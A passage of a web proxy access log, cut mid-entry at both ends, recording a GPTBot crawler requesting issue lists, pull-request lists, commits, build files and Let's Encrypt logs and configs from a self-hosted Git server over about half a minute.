24924] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:18:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2flibcomm_core.so" [Client 74.7.227.38] [Length 22156] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 30062] [Gzip 7.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11325] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=rendered" [Client 74.7.227.38] [Length 13159] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:18:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:18:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:18:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" +[17/Feb/2026:18:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&state=open&type=all" +[17/Feb/2026:18:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fwatchdog.spec" [Client 74.7.227.38] [Length 22749] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 11192] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:18:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23975] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:18:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31545] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:18:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33690] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:18:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 36076] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:18:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 39003] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:18:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33880] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:18:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11951] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:18:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11945] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:18:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11952] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:18:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11917] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:18:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11955] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:18:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" +[17/Feb/2026:18:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:18:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] 